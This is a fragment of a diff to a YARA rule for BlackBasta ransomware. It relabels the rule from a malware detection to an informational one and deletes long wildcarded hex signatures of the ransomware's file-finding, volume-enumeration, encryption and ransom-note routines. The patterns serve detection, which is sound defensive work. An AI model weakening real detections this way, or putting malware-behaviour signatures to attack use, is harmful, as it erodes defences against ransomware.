+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cfb2631bc1832f65fb9d77c812bf2a1e05121e825254bd57ae8b21e7b10b2344"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlackBasta"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38
-            75 ?? 74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ??
-            74 ?? 48 8B 44 24 ?? 83 A0 ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8B CF 48 8D 54
-            24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 45 ?? 85 C0 44 89 74 24 ?? 4C 89 74 24 ??
-            49 0F 45 CE 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CC 45
-            33 C0 33 D2 48 8B CF E8 ?? ?? ?? ?? 8B D8 44 38 74 24 ?? 74 ?? 48 8B 4C 24 ?? E8 ??
-            ?? ?? ?? 8B C3 E9 ?? ?? ?? ?? 49 8B 74 24 ?? 49 2B 34 24 48 C1 FE ?? 33 D2 4C 89 75
-            ?? 48 8D 4D ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 44 88 75 ?? E8 ?? ??
-            ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? 39 48 ?? 75 ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0
-            ?? ?? ?? ?? ?? 44 8B C9 EB ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 44 38 75 ?? 74 ?? 48 8B 45
-            ?? 83 A0 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? EB ?? 44 38 75 ?? 74 ?? 48 8B 45 ?? 83 A0
-            ?? ?? ?? ?? ?? 45 8B CE 4C 8D 44 24 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B
-            75 ?? 33 D2 85 C0 49 8B CE 48 0F 45 CA 80 39 ?? 75 ?? 8A 41 ?? 84 C0 75 ?? 38 55 ??
-            74 ?? 49 8B CE E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 38 51 ?? 74 ?? 4D 8B CC 4D 8B C5 48
-            8B D7 E8 ?? ?? ?? ?? 44 8B E8 85 C0 75 ?? 38 45 ?? 74 ?? 49 8B CE E8 ?? ?? ?? ?? 4C
-            8B 6C 24 ?? 48 8D 55 ?? 48 8B CB FF 15 ?? ?? ?? ?? 45 33 F6 85 C0 0F 85 ?? ?? ?? ??
-            49 8B 04 24 49 8B 54 24 ?? 48 2B D0 48 C1 FA ?? 48 3B F2 74 ?? 48 2B D6 48 8D 0C F0
-            4C 8D 0D ?? ?? ?? ?? 45 8D 46 ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 44 38 74
-            24 ?? 74 ?? 48 8B 4C 24
-        }
-		$find_system_volumes_v1_p1 = {
-            48 89 4C 24 ?? 55 53 56 57 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ??
-            48 8B F1 45 33 FF 44 89 7C 24 ?? 4C 89 39 4C 89 79 ?? 4C 89 79 ?? C7 44 24 ?? ?? ??
-            ?? ?? BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 0F 1F 00 4C 8D 8D ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 44 89 7C 24 ?? 4C 89 7C 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24
-            ?? 4C 89 7C 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8D 14 00 48 8D BD ?? ?? ?? ?? 48 03 FA 4C 89 7C 24 ?? 4C 89
-            7C 24 ?? 4C 89 7C 24 ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48
-            8D 9D ?? ?? ?? ?? 48 D1 FA 48 83 FA ?? 72 ?? 45 33 C0 48 8D 4C 24 ?? E8
-        }
-		$find_system_volumes_v1_p2 = {
-            4C 89 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 3B C7 74
-            ?? 66 66 66 0F 1F 84 00 ?? ?? 00 00 44 0F B6 0B 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 3B
-            CA 73 ?? 48 8D 41 ?? 48 89 44 24 ?? 48 8D 44 24 ?? 48 83 FA ?? 48 0F 43 44 24 ?? 44
-            88 0C 08 C6 44 08 ?? ?? EB ?? 45 33 C0 41 8D 50 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48
-            83 C3 ?? 48 3B DF 75 ?? 4C 89 BD ?? ?? ?? ?? 48 8B 46 ?? 48 3B 46 ?? 74 ?? 4C 89 38
-            4C 89 78 ?? 4C 89 78 ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 4C
-            89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 44
-            24 ?? 48 8B D0 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 FF C2
-            48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1
-            48 83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 C7 44 24 ?? ?? ?? ??
-            ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 48 8B C6 48 81 C4
-        }
-		$set_default_icon_p1 = {
-            48 89 5C 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ??
-            48 8B F1 45 33 ED 44 89 6C 24 ?? 4C 8B 35 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 4C 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B C8 49 2B CE 49 3B CF 0F 82 ?? ??
-            ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 4C 0F 43 25 ?? ?? ?? ?? 4C 89 6C
-            24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 4B 8D 2C 37 BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 3B
-            EB 0F 86 ?? ?? ?? ?? 48 8B DD 48 83 CB ?? 48 3B D8 76 ?? 48 8B D8 48 B8 ?? ?? ?? ??
-            ?? ?? ?? ?? 48 8D 0C 00 EB ?? B8 ?? ?? ?? ?? 48 3B D8 48 0F 42 D8 48 8D 4B ?? 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 3B C8 0F 87 ?? ?? ?? ?? 48 03 C9 48 81 F9 ?? ?? ?? ?? 72
-            ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ??
-            ?? ?? ?? 48 8D 78 ?? 48 83 E7 ?? 48 89 47 ?? EB ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48
-            8B F8 EB ?? 49 8B FD 48 89 7C 24 ?? 48 89 6C 24 ?? 48 89 5C 24 ?? 4B 8D 1C 36 4C 8B
-        }
-		$set_default_icon_p2 = {
-            C3 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 48 8D 0C 3B 4F 8D 04 3F 48 8D 15 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 66 44 89 2C 6F BB ?? ?? ?? ?? 89 5C 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ??
-            ?? 48 0F 43 54 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ??
-            48 89 44 24 ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 44 89 6C 24 ?? 45 33 C9 45 33
-            C0 48 C7 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CE 48 83 7E ?? ?? 72 ??
-            48 8B 0E 8B 46 ?? 03 C0 89 44 24 ?? 48 89 4C 24 ?? 44 8B CB 45 33 C0 48 8D 15 ?? ??
-            ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 B9 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? EB ?? 4C 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 4C 24
-            ?? 45 33 C9 44 8B C0 33 D2 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E3 ?? 89 5C 24 ?? 48
-            8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B C1 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 77 ??
-            E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 44 89 6C 24 ?? 48 8B CE
-            E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C
-            5F 5E 5D C3
-        }
-		$cmd_prompt = {
-            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8B EC 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
-            48 89 45 ?? 48 8B D9 4C 8D 05 ?? ?? ?? ?? 33 FF 48 8D 4D ?? 33 D2 48 89 7D ?? E8 ??
-            ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8B 4D ?? 48 85 C9 0F 84 ?? ??
-            ?? ?? 33 D2 E8 ?? ?? ?? ?? 48 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 85 DB 40 0F 94 C7 E9 ??
-            ?? ?? ?? 48 8B 45 ?? 48 8D 0D ?? ?? ?? ?? 48 89 45 ?? 48 89 4D ?? 48 89 5D ?? 48 89
-            7D ?? 48 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 18 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 33 C9
-            89 38 48 8B 55 ?? E8 ?? ?? ?? ?? 48 8B F8 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? 89 18 EB ??
-            E8 ?? ?? ?? ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ?? 48 8B 4D ?? E8 ?? ?? ??
-            ?? 83 CF ?? EB ?? E8 ?? ?? ?? ?? 89 18 48 8D 15 ?? ?? ?? ?? 45 33 C9 4C 8D 45 ?? 48
-            89 55 ?? 33 C9 E8 ?? ?? ?? ?? 48 8B F8 48 8B 4D ?? E8 ?? ?? ?? ?? 8B C7 48 8B 4D ??
-            48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 5D C3
-        }
-		$exclude_from_encryption = {
-            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
-            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
-            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
-            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85
-            ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ??
-            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
-            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
-            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
-            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 89 75 ?? 48 83 FF ?? 0F 85
-            ?? ?? ?? ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ??
-            66 89 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D
-            4D ?? E8 ?? ?? ?? ?? 90 45 33 C0 48 8D 55 ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B F8 48 8B
-            55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA ?? ??
-            ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0
-        }
-		$encrypt_files_v1 = {
-            41 83 CC ?? 44 89 64 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 FF ?? 48 0F 43 8C 24 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B F8 41 83 E4 ?? 44 89 64 24 ?? 48 8B 94 24 ?? ?? ?? ?? 48
-            83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
-            ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 49
-            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 9C 24 ??
-            ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 9C 24 ?? ?? 00 00 40 F6 C7 ?? 74
-            ?? 49 8B CF E8 ?? ?? ?? ?? 90 48 BE ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 4C
-            8D 35 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? C6 84
-            24 ?? ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B F0 48
-            89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 4C 8B 70 ?? 48
-            83 78 ?? ?? 72 ?? 48 8B 30 48 8D 8C 24 ?? ?? ?? ?? 49 83 FE ?? 73 ?? 41 B8 ?? ?? ??
-            ?? 48 8B D6 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? EB ?? 4C 89 AC 24 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 89 BC 24 ?? ?? ?? ?? 49 3B
-            FD 49 0F 47 FD 48 8D 57 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4E 8D 04 75 ?? ??
-            ?? ?? 48 8B D6 48 8B C8 E8 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24
-        }
-		$find_system_volumes_v2 = {
-            BA ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 0F 1F 44 00 ?? 4C 8D 8D ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 89 74 24 ?? 48 89 74 24 ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ??
-            48 89 74 24 ?? 45 33 C9 45 33 C0 33 D2 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 4C 8D 04 00 48 8D 85 ?? ?? ?? ?? 49 03 C0 48 89 74 24 ?? 48 89 74
-            24 ?? 48 89 74 24 ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 48 8D
-            8D ?? ?? ?? ?? 48 3B C8 74 ?? 49 D1 F8 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
-            ?? ?? 90 48 8B 43 ?? 48 3B 43 ?? 74 ?? 48 89 30 48 89 70 ?? 48 89 70 ?? 41 B8 ?? ??
-            ?? ?? 48 8D 54 24 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ??
-            ?? 66 89 74 24 ?? 48 83 43 ?? ?? EB ?? 4C 8D 44 24 ?? 48 8B D0 48 8B CB E8 ?? ?? ??
-            ?? 90 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B
-            C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8
-            ?? 77 ?? E8 ?? ?? ?? ?? 48 89 74 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 89 74 24 ?? 41
-            B8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48
-            8B CF FF 15 ?? ?? ?? ?? 48 8B C3 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E
-            5D C3
-        }
-		$drop_ransom_note = {
-            48 83 3D ?? ?? ?? ?? ?? 48 0F 43 15 ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 4D ?? E8
-            ?? ?? ?? ?? 48 8B D8 4C 89 75 ?? 4C 89 75 ?? 4C 89 75 ?? 45 8D 46 ?? 48 8B D0 48 8D
-            4D ?? E8 ?? ?? ?? ?? 4C 89 73 ?? 48 C7 43 ?? ?? ?? ?? ?? 66 44 89 33 BE ?? ?? ?? ??
-            89 75 ?? 83 E6 ?? 89 75 ?? 48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48
-            8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83
-            C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ??
-            ?? 66 44 89 75 ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 43 4D ?? 4C 89 74 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 48 8B D8 48 83 F8 ?? 74 ?? 4C 89 74 24 ?? 45 33 C9 41 B8 ?? ?? ?? ?? 48 8D 15
-            ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ??
-            48 8B 55 ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 4D ?? 48 8B C1 48 81 FA
-            ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 75 ?? 48 8B 57
-            ?? 48 83 FA ?? 72 ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 0F 48 81 FA ?? ?? ?? ?? 72 ?? 48
-            83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ??
-            4C 89 77 ?? 48 C7 47 ?? ?? ?? ?? ?? 66 44 89 37 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ??
-            49 8B 73 ?? 49 8B 7B
-        }
-		$encrypt_files_v2_p1 = {
-            BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 48 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89
-            85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 49 8B FA 49 8B D1 4D 85 D2
-            74 ?? 4C 8B C1 4D 2B C1 0F B7 02 66 41 39 04 10 75 ?? 48 83 C2 ?? 48 83 EF ?? 75 ??
-            49 2B CB 48 D1 F9 E9 ?? ?? ?? ?? 48 83 C1 ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48
-            8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 90 48 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ??
-            ?? ?? ?? B2 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 0B 00 F3 0F 7F 45 ??
-            48 89 75 ?? 48 89 75 ?? 48 8D 45 ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ??
-            C6 45 ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45
-            ?? ?? 48 8D 45 ?? 83 E0 ?? 48 8D 44 05 ?? 48 89 45 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89
-            44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? 48
-            8D 05 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48
-            C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
-            8B E8 48 89 44 24 ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49
-        }
-		$encrypt_files_v2_p2 = {
-            8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8D 0D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8B CF 41 B8 ?? ?? ?? ?? 49 8B D5
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D5 48 8B 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 83 C1 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 E8 ?? ?? ?? ??
-            BF ?? ?? ?? ?? 4C 3B FF 0F 8D ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8B FE 49 8B C7
-            48 2B C7 48 99 83 E2 ?? 48 03 C2 48 C1 F8 ?? 4C 8B F0 F2 0F 59 35 ?? ?? ?? ?? 0F 57
-            C0 F2 48 0F 2A C0 F2 0F 59 F0 F2 48 0F 2C CE 48 85 C9 0F 85 ?? ?? ?? ?? 4D 85 FF 0F
-            8E ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ??
-            90 48 8D 35 ?? ?? ?? ?? 48 89 75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24
-            ?? 4D 8B CF 45 33 C0 48 8B D3 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49
-            81 FF ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? F2 0F 10 35 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24
-            ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48
-            8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8B CF 45 33 C0 48 8B D3 49 8B CE
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 99 48 F7 F9 4C 8B E8 48 85 C0 75 ?? 48 8D 45 ?? 48
-        }
-		$encrypt_files_v2_p3 = {
-            89 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 35 ?? ?? ?? ?? 48 89
-            75 ?? 4C 8D 35 ?? ?? ?? ?? 4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 4D 8B CF 45 33 C0 48 8B D3
-            48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? E9 ?? ?? ?? ?? 4D 85 F6 0F 8E ??
-            ?? ?? ?? 4D 8B FD 49 C1 E7 ?? 4C 8B A5 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 44 24 ?? 48
-            8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05
-            ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89
-            85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8B C7 48 8B D3 49 8B
-            CC E8 ?? ?? ?? ?? 49 03 F5 49 03 FF 49 3B F6 7C ?? 4C 8B A5 ?? ?? ?? ?? 4C 8B 6C 24
